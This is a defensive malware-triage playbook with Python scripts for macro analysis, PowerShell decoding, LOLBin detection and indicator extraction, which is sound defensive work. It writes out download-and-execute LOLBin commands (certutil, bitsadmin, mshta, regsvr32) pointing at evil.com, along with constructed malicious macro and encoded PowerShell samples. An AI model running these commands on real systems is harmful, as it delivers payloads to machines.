Malware and Script Payload Triage

Analyze malicious documents, scripts, and living off the land techniques.

Last updated: February 2026

Purpose and Scope

This playbook covers initial triage of malware samples and script-based payloads, including Office macros, PowerShell, and living off the land binaries (LOLBins). The goal is rapid categorization and indicator extraction, not deep reverse engineering.

Prerequisites

  • Analysis environment: Isolated VM or sandbox (ANY.RUN, Joe Sandbox, Cuckoo)
  • Static analysis tools: olevba, oledump, strings, file, PEStudio
  • Dynamic analysis: Process Monitor, Wireshark, Sysmon in sandbox
  • Reputation services: VirusTotal, Hybrid Analysis
  • MITRE ATT&CK: For technique mapping

Detection Goals

Triage aims to determine:

  • Is this sample malicious or benign?
  • What capabilities does it have?
  • What indicators can be extracted for detection?
  • What MITRE ATT&CK techniques does it use?
  • Is this part of a known malware family or campaign?

Office Document Analysis

Initial Checks

  • Check file hash against VirusTotal
  • Identify file type: use the file command, not just the extension
  • Look for macros: VBA in .doc/.xls, or embedded objects in newer formats

Macro Extraction with olevba

Use oletools to extract and analyze VBA:

olevba suspicious.doc

Look for:

  • AutoOpen, Document_Open, Workbook_Open (auto execution)
  • Shell, WScript.Shell, CreateObject (code execution)
  • PowerShell, cmd, mshta invocations
  • Base64 or hex encoded strings
  • URLs, IP addresses, file paths
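The checklist above can be applied mechanically once olevba has printed the VBA source. The script below is an added example for this playbook, not RedPhish's or oletools' own code: it takes extracted VBA text, groups the keyword hits into the three categories listed above, decodes any base64 string it finds, pulls out URLs, IPv4 addresses and Windows paths, and gives a simple verdict. The SAMPLE_VBA macro, its base64 string, the 198.51.100.23 address and the file path are all constructed for the example.

```python
import base64
import re

# Constructed sample: the kind of VBA text olevba prints for a suspicious
# document. Hypothetical, written for this example; not a real sample.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    Dim s As String
    s = "cG93ZXJzaGVsbCAtbm9wIC13IGhpZGRlbiAtYw=="
    sh.Run "cmd /c " & "c:\users\public\run.bat", 0
    Call Fetch("http://198.51.100.23/stage.dat")
End Sub
'''

# Keyword groups follow the "Look for" list above.
KEYWORDS = {
    "autoexec": ["AutoOpen", "AutoExec", "Document_Open", "Workbook_Open"],
    "execution": ["Shell", "WScript.Shell", "CreateObject", "Run"],
    "interpreter": ["powershell", "cmd", "mshta"],
}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PATH_RE = re.compile(r"[a-z]:\\[^\s\"']+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_if_base64(token):
    """Return the decoded text if token is valid base64 of printable text, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (ValueError, TypeError):
        return None
    if not raw or sum(32 <= b < 127 for b in raw) / len(raw) < 0.9:
        return None
    return raw.decode("ascii", "replace")


def triage_vba(vba_text):
    """Categorise keywords and pull indicators out of extracted VBA source."""
    decoded = [d for d in map(decode_if_base64, B64_RE.findall(vba_text)) if d]
    # Keywords are matched against the source and against any decoded strings,
    # so an interpreter name hidden inside base64 is still caught.
    corpus = vba_text + "\n" + "\n".join(decoded)
    report = {"decoded_base64": decoded}
    for group, words in KEYWORDS.items():
        hits = [w for w in words
                if re.search(r"\b" + re.escape(w) + r"\b", corpus, re.I)]
        report[group] = sorted(hits)
    report["urls"] = sorted(set(URL_RE.findall(corpus)))
    report["ips"] = sorted(set(IPV4_RE.findall(corpus)))
    report["paths"] = sorted(set(PATH_RE.findall(corpus)))
    # Auto-execution plus an execution primitive is the classic dropper shape.
    triggers = report["autoexec"] and (report["execution"] or report["interpreter"])
    report["verdict"] = "suspicious" if triggers else "review"
    return report


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key:16} {value}")
```

Feed it the text olevba prints (for example, redirect `olevba suspicious.doc` to a file and read that in) in place of SAMPLE_VBA. The verdict is deliberately coarse: it only says whether the macro has the auto-run-plus-execute shape, and the analyst still reads the decoded strings and URLs.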

Common Macro Techniques

  • Download and execute: macro downloads payload from URL and runs it
  • Embedded payload: executable hidden in document properties or forms
  • DDE abuse: Dynamic Data Exchange to run commands without macros
  • Template injection: document loads remote template with malicious macro

PowerShell Analysis

Decoding Obfuscation

Common obfuscation patterns:

  • Base64: -EncodedCommand or -enc parameter
  • Compression: GZip or Deflate streams
  • String manipulation: Concatenation, replace, reverse
  • Variable substitution: Using environment variables or WMI

Decode base64 commands:

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('base64string'))

Key Indicators in PowerShell

  • IEX (Invoke-Expression): executes string as code
  • DownloadString, DownloadFile: network retrieval
  • New-Object Net.WebClient: network operations
  • Reflection.Assembly: loading code in memory
  • Execution policy bypass flags
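The decoding one-liner above handles one layer. In practice an -EncodedCommand payload often wraps a second, compressed layer, and the indicators are spread across all of them. The script below is an added example, not part of this playbook: it finds the encoded argument on a command line, decodes it as UTF-16LE, tries gzip, raw deflate and zlib on every long base64 token inside the decoded script, and then checks every layer against the Key Indicators list above. The SAMPLE_CMDLINE, its inner script and the 203.0.113.7 URL are constructed in the block for the example; they are not from a real incident.

```python
import base64
import gzip
import re
import zlib

# Constructed sample: a one-liner that inflates a gzip'd base64 blob, runs it
# with IEX, then fetches a second stage. Blob, script and URL are made up.
INNER_SCRIPT = "[Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"
GZ_BLOB = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
SCRIPT = (
    "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + GZ_BLOB + "'));"
    "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
    "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    "(New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
)
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
                  + base64.b64encode(SCRIPT.encode("utf-16le")).decode())

# -e, -ec, -en, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_ARG_RE = re.compile(r"(?:^|\s)-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
INDICATORS = {  # the Key Indicators list above, as patterns
    "IEX/Invoke-Expression": r"\bIEX\b|Invoke-Expression",
    "DownloadString/DownloadFile": r"Download(?:String|File)",
    "Net.WebClient": r"Net\.WebClient",
    "Reflection.Assembly": r"Reflection\.Assembly",
    "ExecutionPolicy bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "Hidden window": r"-w(?:indowstyle)?\s+hidden",
    "Compressed stream": r"GzipStream|DeflateStream",
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def inflate_blobs(script):
    """Try gzip, raw deflate and zlib on every long base64 token in a script."""
    found = []
    for token in B64_BLOB_RE.findall(script):
        try:
            raw = base64.b64decode(token)
        except ValueError:
            continue
        for inflate in (gzip.decompress, lambda b: zlib.decompress(b, -15), zlib.decompress):
            try:
                found.append(inflate(raw).decode("utf-8", "replace"))
                break
            except (OSError, zlib.error, EOFError):
                continue
    return found


def analyze_powershell(cmdline):
    """Peel the encoding layers and report which key indicators appear in any layer."""
    script = decode_encoded_command(cmdline)
    inflated = inflate_blobs(script) if script else []
    layers = "\n".join([cmdline, script or ""] + inflated)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, layers, re.I)]
    return {"decoded_script": script, "decompressed": inflated, "indicators": hits}


if __name__ == "__main__":
    result = analyze_powershell(SAMPLE_CMDLINE)
    print(result["decoded_script"])
    print(result["decompressed"])
    print(result["indicators"])
```

The indicator scan runs over the raw command line as well as the decoded layers, because flags such as the window style and execution policy only appear in the outer command. Samples that use string concatenation or environment-variable tricks rather than encoding still need the analyst to evaluate them by hand in an isolated VM.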

Living off the Land Binaries (LOLBins)

Attackers use built-in Windows tools to avoid detection. Common LOLBins:

Download and Execute

  • certutil: certutil -urlcache -split -f http://evil.com/payload.exe
  • bitsadmin: bitsadmin /transfer job http://evil.com/payload.exe
  • mshta: mshta http://evil.com/payload.hta
  • regsvr32: regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll

Code Execution

  • rundll32: Execute DLL exports or JavaScript
  • wmic: Process creation and script execution
  • cscript/wscript: Run VBS and JS files
  • msiexec: Install from URL

Detection Approach

Monitor for LOLBins with:

  • Unusual command line arguments
  • Network connections from unexpected processes
  • Execution from unusual parent processes
  • Execution from temp or user writable directories
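The four monitoring points above turn into rules easily. The script below is an added example for this playbook, not RedPhish's code: it runs a small rule set over constructed Sysmon-style events (EventID 1 process creation and EventID 3 network connection), covering the LOLBin command lines listed above, Office applications as parents, images in user-writable directories, and network connections from binaries that should not normally make them. Each hit is tagged with the ATT&CK technique used in the mapping section of this playbook; the paths, users and the 203.0.113.7 address are made up, and T1047 for wmic is an addition not on the playbook's list.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network
# connect). Paths, users and the 203.0.113.7 address are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgA",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.7/x.exe C:\Users\Public\x.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.7/a.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "CommandLine": "update.exe /silent",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# (rule name, image basenames, command-line pattern, ATT&CK technique)
LOLBIN_RULES = [
    ("certutil download", ("certutil.exe",), r"-urlcache", "T1105"),
    ("bitsadmin transfer", ("bitsadmin.exe",), r"/transfer", "T1105"),
    ("mshta remote content", ("mshta.exe",), r"https?://|javascript:|vbscript:", "T1218"),
    ("regsvr32 scriptlet", ("regsvr32.exe",), r"/i:https?://|scrobj\.dll", "T1218"),
    ("rundll32 script", ("rundll32.exe",), r"javascript:", "T1218"),
    ("msiexec remote install", ("msiexec.exe",), r"/i\s+https?://", "T1218"),
    ("wmic process create", ("wmic.exe",), r"process\s+call\s+create", "T1047"),
    ("script host", ("wscript.exe", "cscript.exe"), r"\.(?:vbs|vbe|js|jse|wsf)\b", "T1059"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE_RE = re.compile(r"\\(?:temp|appdata|users\\public|programdata|downloads)\\", re.I)
NO_NETWORK_EXPECTED = {"regsvr32.exe", "mshta.exe", "rundll32.exe",
                       "wscript.exe", "cscript.exe", "wmic.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage_events(events):
    """Apply the monitoring checks to each event; return one alert per rule hit."""
    alerts = []

    def alert(index, image, rule, technique):
        alerts.append({"index": index, "image": image, "rule": rule, "technique": technique})

    for index, ev in enumerate(events):
        image = basename(ev["Image"])
        if ev["EventID"] == 3:
            # Network connection from a binary that should not normally talk out.
            if image in NO_NETWORK_EXPECTED:
                alert(index, image, "network connection from unexpected process", "T1218")
            continue
        cmd = ev.get("CommandLine", "")
        for rule, images, pattern, technique in LOLBIN_RULES:
            if image in images and re.search(pattern, cmd, re.I):
                alert(index, image, rule, technique)
        if basename(ev.get("ParentImage", "")) in OFFICE_PARENTS:
            alert(index, image, "office application spawned child", "T1204")
        if USER_WRITABLE_RE.search(ev["Image"]):
            alert(index, image, "execution from user-writable directory", None)
    return alerts


if __name__ == "__main__":
    for a in triage_events(SAMPLE_EVENTS):
        print(f"event {a['index']}: {a['image']} -> {a['rule']} ({a['technique']})")
```

The svchost.exe event produces nothing, which is the point of keying rules on image plus argument rather than image alone: certutil and regsvr32 are used legitimately all day, and only the argument shape or the network connection makes the event worth a look. Real deployments tune the parent and path lists to the environment's own baseline.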

Sandbox Analysis

Dynamic Execution

  1. Submit sample to sandbox or detonate in isolated VM
  2. Monitor: process creation, file system, registry, network
  3. Capture: dropped files, network traffic, memory artifacts
  4. Extract indicators: URLs, IPs, domains, file hashes, mutexes

Sandbox Evasion Indicators

Samples may check for analysis environments:

  • VM detection (VMware, VirtualBox artifacts)
  • Sandbox usernames or computer names
  • Low CPU/memory resources
  • Lack of user activity (mouse movement, documents)
  • Time-based delays

Indicator Extraction

Extract and document:

  • File hashes (MD5, SHA1, SHA256)
  • Network indicators (domains, IPs, URLs)
  • File paths and names
  • Registry keys modified
  • Mutex names
  • Command line patterns
  • YARA signatures if available
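Most of the items in this list, and the VM-artifact strings from the sandbox evasion section above, can be pulled out of a dropped file's strings in one pass. The script below is an added example for this playbook, not RedPhish's code: it hashes a byte blob with MD5, SHA1 and SHA256, extracts narrow and wide (UTF-16LE) printable strings the way `strings` does, picks out URLs, IPs, domains, registry keys, mutex names and VM-related strings, and defangs the network indicators so the record can be shared safely. SAMPLE_BYTES and every value inside it (the URL, registry key, mutex, domain and VBox reference) are constructed for the example.

```python
import hashlib
import re

# Constructed byte blob standing in for a dropped file. Every string in it
# (URL, registry key, mutex, domain, VBox reference) is made up for this example.
SAMPLE_BYTES = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"http://203.0.113.7/gate.php\x00"
    + b"\x01\x02\x03"
    + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16le") + b"\x00\x00"
    + b"\x7f\x7f"
    + b"Global\\MutexDemo\x00"
    + b"cdn.example.net\x00"
    + b"VBoxService.exe\x00"
    + b"\xff\xfe\xfd"
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
REG_RE = re.compile(r"HK(?:LM|CU|CR|U|CC)\\[^\s\"']+")
MUTEX_RE = re.compile(r"(?:Global|Local)\\[\w-]+")
# Dotted tokens ending in these are file names, not domains.
FILE_EXT = {"exe", "dll", "php", "dat", "ps1", "bat", "txt", "hta", "sct", "js", "vbs"}
EVASION_TERMS = ("vmware", "virtualbox", "vbox", "sandbox")


def hash_bytes(data):
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def extract_strings(data):
    """Narrow and wide printable runs, like `strings -a` followed by `strings -el`."""
    narrow = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    wide = [m.group().decode("utf-16le") for m in WIDE_RUN.finditer(data)]
    return narrow + wide


def defang(ioc):
    """Neutralise a URL, domain or IP so it cannot be clicked when shared."""
    if "://" not in ioc:
        return ioc.replace(".", "[.]")
    scheme, rest = ioc.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def build_ioc_record(data, defang_network=True):
    """Hashes plus the indicator types from the list above, from one pass over strings."""
    strings = extract_strings(data)
    text = "\n".join(strings)
    urls = sorted(set(URL_RE.findall(text)))
    ips = sorted(set(IPV4_RE.findall(text)))
    # Domains come from text with URLs blanked so hosts are not double counted.
    rest = URL_RE.sub(" ", text)
    domains = sorted({d for d in DOMAIN_RE.findall(rest)
                      if d.rsplit(".", 1)[-1].lower() not in FILE_EXT})
    fix = defang if defang_network else (lambda s: s)
    return {
        "hashes": hash_bytes(data),
        "urls": [fix(u) for u in urls],
        "ips": [fix(i) for i in ips],
        "domains": [fix(d) for d in domains],
        "registry_keys": sorted(set(REG_RE.findall(text))),
        "mutexes": sorted(set(MUTEX_RE.findall(text))),
        "evasion_hints": sorted({s for s in strings
                                 if any(t in s.lower() for t in EVASION_TERMS)}),
    }


if __name__ == "__main__":
    for key, value in build_ioc_record(SAMPLE_BYTES).items():
        print(f"{key:14} {value}")
```

Replace SAMPLE_BYTES with the contents of a dropped file read in binary mode. The wide-string pass matters on Windows samples, where registry paths and mutex names are often stored as UTF-16LE and never show up in a plain ASCII `strings` run; the evasion_hints field is only a prompt to look closer in the sandbox, not proof of evasion.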

MITRE ATT&CK Mapping

Map observed behaviors to techniques:

  • T1059: Command and Scripting Interpreter
  • T1204: User Execution
  • T1218: System Binary Proxy Execution
  • T1027: Obfuscated Files or Information
  • T1105: Ingress Tool Transfer

Response Actions

  • Block extracted IOCs at perimeter and endpoint
  • Create detection rules for observed command patterns
  • Hunt for related samples using YARA or file metadata
  • Share indicators with threat intelligence platforms
  • Update email filters for attachment types used
